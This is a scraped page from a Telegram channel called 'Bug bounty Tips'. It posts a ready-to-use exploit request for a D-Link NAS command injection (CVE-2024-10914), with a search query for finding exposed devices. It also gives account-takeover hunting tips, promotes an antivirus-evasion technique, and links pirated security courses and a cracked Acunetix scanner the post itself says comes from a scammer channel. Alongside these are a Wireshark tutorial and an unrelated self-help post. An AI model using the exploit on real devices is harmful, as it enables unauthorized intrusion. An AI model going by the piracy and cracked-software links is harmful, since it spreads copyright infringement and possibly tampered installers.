uk
Feedback
Bug bounty Tips

Bug bounty Tips

Відкрити в Telegram

🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️‍♂️ OSINT Specialist Admin: @laazy_hack3r

Показати більше
5 993
Підписники
+1624 години
+827 днів
+34730 день
Архів дописів
cve-2024-10914 GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;;%27 FOFA:app =D_Link-DNS-ShareCenter #exploit #poc
cve-2024-10914 GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27 FOFA:app =D_Link-DNS-ShareCenter #exploit #poc #IoT

MY ADVICE TO YOUTHS 1. Your control of your sexual urges will be the reason you are either successful or a failure. 2. Porn and masturbation is the greatest killer of success. It stunt and destroy your brain. 3. Avoid drinking alcohol like a camel drinking water. Nothing worse than losing your senses and acting a fool. 4. Keep your standards high and don't settle for something because it's available. 5. If you find someone smarter than you, work with them, don't compete. 6. No one is coming to save your problems. Your life's 100% is your responsibility. 7. You shouldn't take advice from people who are not where you want to be in life. 8. Find new ways to make money. Make money and ignore the jokers who mocks and make fun of you. 9. You don't need 100 self-help books, all you need is action and self discipline. Be disciplined! 10. Avoid drugs. Avoid weed. 11. Learn skills on YouTube not wasting your time consuming shitty content on Netflix. 12. No one cares about you. So stop being shy, go out and create your chances. 13. Comfort is the worst addiction and cheap ticket to depression. 14. Prioritize your family. Defend them even if they stink, even if they are idiots. Cover their nakedness. 15. Find new opportunities and learn from people ahead of you. 16. Trust no one. Not a single person no matter how tempted. Believe in yourself. 17. Don't wait for miracles make them happen. Yes you can't always do it alone but don't listen to the opinion of people. 18. Hardwork and determination can make you achieve anything. Humbling yourself only takes you higher. 19. Stop waiting to discover yourself. Create YOU instead. 20. The world won't slow down for you. 21. No one owes you anything. 22. Life is a single-player game. You’re born alone. You’re going to die alone. All of your interpretations are alone. You’re gone in three generations and nobody cares. Before you showed up, nobody cared. It’s all single-player.

🔖afrog🐸 - A Security Tool for Bug Bounty, Pentest and Red Teaming. afrog is a high-performance vulnerability scanner that i
🔖afrog🐸 - A Security Tool for Bug Bounty, Pentest and Red Teaming.
afrog is a high-performance vulnerability scanner that is fast and stable. It supports user-defined PoC and comes with several built-in types, such as CVE, CNVD, default passwords, information disclosure, fingerprint identification, unauthorized access, arbitrary file reading, and command execution. With afrog, network security professionals can quickly validate and remediate vulnerabilities, which helps to enhance their security defense capabilities.
Installation
go install -v github.com/zan8in/afrog/v3/cmd/afrog@latest
📱Github: 🔗Link

18. Bypassing Digits Origin Validation Which Leads to Account Takeover- How to Hunt: - Look for vulnerabilities where digits origin validation can be bypassed. - Refer to [HackerOne Report 129873](https://hackerone.com/reports/129873) for more details. 19. Top ATO Reports in HackerOne - How to Hunt: - Review top account takeover reports in HackerOne. - Refer to [TOP ACCOUNT TAKEOVER](https://github.com/reddelexc/hackerone-reports/blob/master/tops_by_bug_type/TOPACCOUNTTAKEOVER.md) for more details.

☄️𝗔𝗰𝗰𝗼𝘂𝗻𝘁 𝗧𝗮𝗸𝗲𝗼𝘃𝗲𝗿 𝗕𝘂𝗴 𝗕𝗼𝘂𝗻𝘁𝘆 𝗧𝗶𝗽𝘀 𝗳𝗼𝗿 𝗡𝗲𝘄 𝗕𝘂𝗴 𝗛𝘂𝗻𝘁𝗲𝗿𝘀☄️ ⚠️Simplified Tips for Account Takeover (ATO)
1. Pre-Account Takeover - How to Hunt: - Register an email without verifying it. - Register again using a different method (e.g., 'sign up with Google') with the same email. - Check if the application links both accounts. - Try logging in to see if you can access information from the other account. 2. Account Takeover due to Improper Rate Limiting - How to Hunt: - Capture the login request. - Use tools like Burp Suite's Intruder to brute-force the login. - Analyze the response and length to detect anomalies. 3. Account Takeover by Utilizing Sensitive Data Exposure - How to Hunt: - Pay attention to the request and response parts of the application. - Look for exposed sensitive data like OTPs, hashes, or passwords. 4. Login Vulnerabilities - Check for: - Brute-force vulnerabilities. - OAuth misconfigurations. - OTP brute-forcing. - JWT misconfigurations. - SQL injection to bypass authentication. - Proper validation of OTP or tokens. 5. Password Reset Vulnerabilities - Check for: - Brute-force vulnerabilities in password reset OTPs. - Predictable tokens. - JWT misconfigurations. - IDOR vulnerabilities. - Host header injection. - Leaked tokens or OTPs in HTTP responses. - Proper validation of OTP or tokens. - HTTP parameter pollution (HPP). 6. XSS to Account Takeover - How to Hunt: - Try to exfiltrate cookies or auth tokens. - Craft XSS payloads to change user email or password. 7. CSRF to Account Takeover - Check for: - Vulnerabilities in email update endpoints. - Vulnerabilities in password change endpoints. 8. IDOR to Account Takeover - Check for: - Vulnerabilities in email update endpoints. - Vulnerabilities in password change endpoints. - Vulnerabilities in password reset endpoints. 9. Account Takeover by Response & Status Code Manipulation- How to Hunt: - Look for vulnerabilities where manipulating response or status codes can lead to account takeover. 10. Account Takeover by Exploiting Weak Cryptography- Check for: - Weak cryptographic implementations in password reset processes. 11. Password or Email Change Function- How to Hunt: - If you see email parameters in password change requests, try changing your email to the victim's email. 12. Sign-Up Function- How to Hunt: - Try signing up with the target email directly. - Use third-party sign-ups with phone numbers, then link the victim's email to your account. 13. Rest Token - How to Hunt: - Try using your REST token with the target account. - Brute 13. Rest Token- How to Hunt: - Try using your REST token with the target account. - Brute force the REST token if it is numeric. - Try to figure out how the tokens are generated. For example, check if they are generated based on timestamp, user ID, or email. 14. Host Header Injection- How to Hunt: - Intercept the REST account request. - Change the Host header value from the target site to your own domain (e.g., `POST /PassRest HTTP/1.1 Host: Attacker.com`). 15. CORS Misconfiguration to Account Takeover - How to Hunt: - Check if the application has CORS misconfigurations. - If so, you might be able to steal sensitive information from the user to take over their account or make them change authentication information. - Refer to [CORS Bypass](https://book.hacktricks.xyz/pentesting-web/cors-bypass) for more details. 16. Account Takeover via Leaked Session Cookie - How to Hunt: - Look for vulnerabilities where session cookies are leaked. - Refer to [HackerOne Report 745324](https://hackerone.com/reports/745324) for more details. 17. HTTP Request Smuggling to ATO- How to Hunt: - Look for HTTP request smuggling vulnerabilities. - Refer to [HackerOne Reports 737140 and 740037](https://hackerone.com/reports/737140) and [HackerOne Report 740037](https://hackerone.com/reports/740037) for more details.

Complete_Shodan_Guide.pdf4.26 MB

TCM Security All Courses Working Links TCM - Practical API Hacking Download link https://mega.nz/file/hbsiGBgB#ga6xtaKR34RVD9AkplbT3TFS-4w_qPuz1u-PO08Bp68 TCM Security Beginners Guide to IOT and Hardware Hacking https://mega.nz/file/XdpgqZbK#FJYd5jYGlv9IEAj7 in group Mobile App pentesting TCM course https://mega.nz/folder/g2g0nKRT#2XcoogAEmY-0I2_e6H-EbA TCM pratical website penetration testing course https://mega.nz/file/aB4FwYbC#mhbmg5paSYnQzeKfSIu5sjkiItRFFMhJS61inuYiXzA TCM - Academy Live Workshops 2024 https://mega.nz/file/FHFU3CjI#RE42dC0Xv9prS4vQQMA2L9B-VQX3cD-gwc_ZPTLNgms TCM - Linux Privilege Escalation for Beginners2024 ☠Download link https://mega.nz/file/tXNTALAJ#sHd67ibXDCNctt_5ElBMUfe79AYt7VQEEIibzOuj2UY TCM - Windows Privilege Escalation for Beginners2024 Download Link: https://mega.nz/file/NKMkDL4C#YCOFniKH2zZYfRbZx6DiCEZgQ8z_OtOfa12omh1vzrs *📚 TCM Security C# 101 For Hackers Course Aug 2024 📚 > Download link: https://mega.nz/folder/add3iSCC#fGd_clQxU8lMZZZ-pFBScw TCM Security Practical Malware Analysis https://mega.nz/folder/zrQHlKyS#ZUPIYssfkZaXj578WIUtWQ TCM Security Practical Phishing Assessment https://mega.nz/folder/frgnVY5A#A02_HFg-SKzn21jpG3l-Lg TCM Security Python 101 For Hackers https://mega.nz/folder/HjgQXJJJ#ok--ait7yppytYJol7jrxQ 📚 TCM Security Rust 101 For Hackers Course Aug 2024 📚 > Download link: https://mega.nz/folder/LAlixBpD#xtR9LM5sfbU4qRCjEBfDOg 📚 TCM Security SOC 101 25 hours full course Aug 2024 📚 > Download link: https://mega.nz/folder/fB0jVLwR#Lz3Db9D3yWB-juaRvuhfRw TCM Security - Open-Source Intelligence (OSINT) Fundamentals https://teraboxapp.com/s/1BDXVPWJkWjexCdy2oNh3FA If you like this post, help us improving this channel https://t.me/boost/bugbounty_tech

🔷 Learn about Wireshark Network Analysis Tool on Kali Linux⬜️ --- introduction Welcome😴 Today, we will learn about one of t
🔷 Learn about Wireshark Network Analysis Tool on Kali Linux⬜️ --- introduction Welcome😴 Today, we will learn about one of the most powerful network analysis tools in the Linux world: Wireshark . If you want to monitor and analyze traffic on your network, and understand different protocols, Wireshark is the perfect tool for you!✨ --- What is Wireshark?🤔 Wireshark is an open source network protocol analyzer that allows you to capture and examine data traffic in real time or from saved files. With Wireshark, you can: - Monitor network traffic in detail.🌐 - Analyze protocols and understand how they work.🔍 - Troubleshoot and fix network issues.📎 - Learn more about computer networks and different protocols.📚 --- How to Install Wireshark on Kali Linux⚙️ On Kali Linux, Wireshark is usually installed by default. But if it is not installed, you can easily install it:
sudo apt update
sudo apt install wireshark
During installation, you may be asked whether you want to allow non-root users to capture packages. If you want to, choose Yes . --- How to use Wireshark🔖 After installation, you can launch Wireshark through the main menu or by typing the following command in the terminal:
wireshark
An interactive graphical interface will appear. --- Start capturing packets🗣️ 1. Select a network interface : When you open Wireshark, a list of available network interfaces will appear. Select the interface you want to monitor (such as eth0 or wlan0 ). 🖧 2. Start Capture: Double-click the interface or press the Start button to start capturing packets.😀 3. View Packets : Packets will start appearing in the list instantly, with details such as time, source, destination, protocol, and information. --- Packet analysis🔍 - Packet Filtering : You can use the filter bar to select only the protocols or addresses you want to display. For example: http to display only HTTP packets. - ip.addr == 192.168.1.1 to display packets related to a specific IP address. - Inspect the packet : Click on any packet to view its details at the bottom, where you can explore the protocol headers and information sent. --- Save and load files 💾 - Save capture : You can save the current session for later review by: - Go to File > Save As and specify a file name and location. - Upload a file : If you have a saved package file, you can open it by: - Go to File > Open and select the file. --- Advanced uses⭐️ TCP flow monitoring - Reassemble Conversations : You can reassemble an entire TCP conversation by: - Right click on a package. - Select Follow > TCP Stream . - A window will appear containing the data exchanged between the two parties. Analysis of different protocols - DNS, HTTP, FTP, etc .: You can analyze how these protocols work and see the data sent and received. --- Important tips⚠️ - Privacy and Security : Make sure you have permission to monitor the network, as capturing packets may be illegal if done without consent. - Run as administrator : To capture packets, you may need to run Wireshark with root privileges or add the user to the wireshark group. --- conclusion Wireshark is a powerful tool that helps you better understand your network and solve problems effectively. Whether you are a network administrator, developer, or student, Wireshark will provide you with a deep insight into the world of networking. Try it now and enjoy learning more!🏠 Posted by @BugSpy don't share without credit. Make me admin in your channel to get more followers !! And awesome content for free🦋

How to Use IPv4 to Bypass Any Signature-Based Antivirus Detection🔯 In this video you will learn technique for bypassing signature based antivirus detection by converting shellcode into IPv4 addresses. see exactly how this bypass method works Posted by @BugSpy don't share without credit. Make me admin in your channel to get more followers !! And awesome content for free🦋

Acunetix v24.9.241015145 - 17 Oct 2024 Windows: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v24.9.241015145-Windows-Pwn3rzs-CyberArsenal.rar Linux: https://pwn3rzs.co/scanner_web/acunetix/Acunetix-v24.9.241015145-Linux-Pwn3rzs-CyberArsenal.7z Password: Pwn3rzs ⚠️ Installers come from the known scammer channel, so remember to pay attention and use a safe environment!!!! ⚠️ Changelog: Too long for a post, refer here: https://www.acunetix.com/changelogs/acunetix-premium/v24-9-2-16-october-2024/

Hack the Cybersecurity Interview - A complete interview preparation guide for jumpstarting your cybersecurity career by Ken Underhill, Christophe Foulon and Tia Hopkins (2022)

📌 The Art of X: Build a Business That Makes You $100/Day (UPDATED August 2023) ✅ 🔗 https://lifemathmoney.gumroad.com/l/TwitterGuide 𝗦𝗵𝗮𝗿𝗲 𝘄𝗶𝘁𝗵 𝗘𝘃𝗲𝗿𝘆𝗼𝗻𝗲✔️ 𝗕𝘆 : 𝗧𝗛𝗘 𝗚𝗛𝗢𝗦𝗧𝗦™ 🔺🔻𝗞𝗲𝗲𝗽 𝗦𝘂𝗽𝗽𝗼𝗿𝘁𝗶𝗻𝗴 🔺🔻

💙Cybersecurity Guide💙
Cybersecurity involves strategies and technologies designed to protect devices, networks, and data from unauthorized access or attacks.
  Key Concepts 🚫Confidentiality
Ensuring that information is not accessed by unauthorized individuals.
♥️Integrity
Maintaining the accuracy and reliability of data by preventing modifications.
🕊Availability
Ensuring that information and resources are accessible to authorized users when needed.
🚨Common Threats
Phishing Attacks & Spammming Malicious Websites/Site Spoofing Password Cracking Man-in-the-Middle Attacks (MITM) Ransomware & Malwares  Insider Threats Unpatched Softwares
  ⭐️Fundamental Securities
Firewalls Antivirus Softwares Encryption Softwares Access Controls#cidint
  ❤️Intermediate Concepts
Network Security Application Security Incident Response Security Policies
  🦇Advanced Cybersecurity Topics
Threat Intelligence Penetration Testing Security Information and Event Management Zero Trust Architecture
Credit:-@MajorKali

1 .Premium Courses for free 2. 22 TB BIG COLLECTION PREMIUM COURSE 🎭 mega link 3.22 TB BIG COLLECTION PREMIUM COURSE 🎭 drive link All gfg courses 4.gfg Striver live classes DSA problem solving 5.gfg Placement 100 interview preparation 6.gfg Data structures with python 7.gfg Os DBMS cn for sde interview 8.gfg Self placed dsa 9.gfg Java foundation 10.gfg Fundamentals of java 11.gfg Python foundation 12.gfg Java app development -winter training 13. Gfg C programming 14. Gfg Amazon sde test series 15 . Gfg Java backend 16. Gfg Java lectures Gfg completed all courses 17.All courses by Angela yu course 18. iNeuron - Full Stack Web Development with Python in Hindi 19. Full stack block chain development 20. Full stack data development 21. Full stack javascript developer 22. Job ready big data bootcamp 23. Mastering data science 24. Full stack web development 2.0 25. Five thousands+ cheat notes 26.Java DSA by hitesh chaudary 27.Scaler java 28. Placement materials 1tb drive link 29. Farz - Data Structures & Algorithms Fellowship 30. All 𝗣𝗬𝗧𝗛𝗢𝗡 𝗠𝗘𝗚𝗔 𝗖𝗢𝗨𝗥𝗦𝗘 31. Huge Road Maps Collections for Developers 32. [AppliedAI] Machine Learning Online Course 33. Full stack web development english 34. 100+ Paid Courses Drive Link 35. Made easy gate mega link 35 . unacademy, gateacademy 36. Ace gate 37.GATEFLIX [CSE] 38.extra high quality education 100 gb Drive link 39. Namaste node js 40. Gate ESE Course Download mega link 41. devops complete course 42.Mera placement hoga course mega link 43. *📚 All Type of Campus Placement Material 📚* 44.Programming and Data Structures - Subbarao Lingamgunta - GATE 2024 Mega link 45.GAME DEVELOPMENT COURSE LEARN HOW TO MAKE GAMES IN UNITY! ✅ Mega link 46. Master the Coding Interview_ Data Structures 47.[CodingBlocks] Android App Development Master Course 48.Coding Blocks Web Development with Python-Django 49.Coding Blocks - Master Interview Questions for FAANG & Product Companies 50.[Coding Blocks] Data Structures in Real Life Projects 51. Data Science Master Course code blocks 52. CodeEater - Blockchain Easy Download 53. Leet code courses 54. Machine learning 🫥🫥 55. Coding ninjas full stack web development 56. Coding blocks - Competitive programming 57.[Coding Ninjas] Advanced Front-End Web Development with React 58.PrepBytes courses 59. 100 Days of Code The Complete Python Pro Bootcamp 60. [Coding Ninjas] Java Foundation with Data Structures & Algorithms [English & Hindi] 61. [CodingNinjas] Python Foundation with Data Structures & Algorithms 62. Complete delta course Apna college Part 1 Apna college Part 2 63.📚 Complete Front end resources 64.React native courses 65.*🔰 22 UDEMY LATEST COURSES 🔰* 66.Code With Mosh Course 170gb course 67.COMPLETE ANDROID DEVELOPER COURSE BUILD IN 14 APPS 68.US wale - kohort 69.*🔰 100GB+ OF EDITING PACK/PRESET PACK | READY TO USE 🔰* 70.GATE - CSE ❤️ 71.Spring boot Microservies 24-25 Setup course 72.Ashok it Gen Ai Latest 2024-25 73.HiteshChoudharyWebDev Complete web development PREPINSTA courses 74. PREPINSTA - ROYAL PASS 75 . C CPP courses - PREPINSTA 76.DSA - PREPINSTA 77. PREPINSTA - TCS NQT Course 2023 78.PREPINSTA - ELITMUS COURSE 79.PREPINSTA - Wipro NLTH 80.Dsa gfg c/c++ 81. Apna college c++ 82.Sigma batch apna college: 83.Delta batch Apna college 84. complete-machine-learning-nlp-bootcamp-mlops 85. Data Structures and Algorithms with JAVA 86. Love Babbar Oops unacademy 87.🔰 PyTorch for Deep Learning Bootcamp 88.Abdul Bari sir java programming 89.[IIBM institute] ai and machine learning 90.ALL CODING BLOCKS COURSES IN ONE LINK **How to open this link** **Secure telegram channel** **WhatsApp channel** **Second telegram channel ** **@all_courses_for_fre**

■■■□□ CSRF + POST Body Param Reflection = POST-Based XSS. https://blog.bhuwanbhetwal.com.np/csrf-post-body-param-reflection-post-based-xss-a-brainfuck

Game of Active Directory (GOAD).pdf9.74 MB

OSCP Cheat Sheet.pdf

oscp+ ad methodology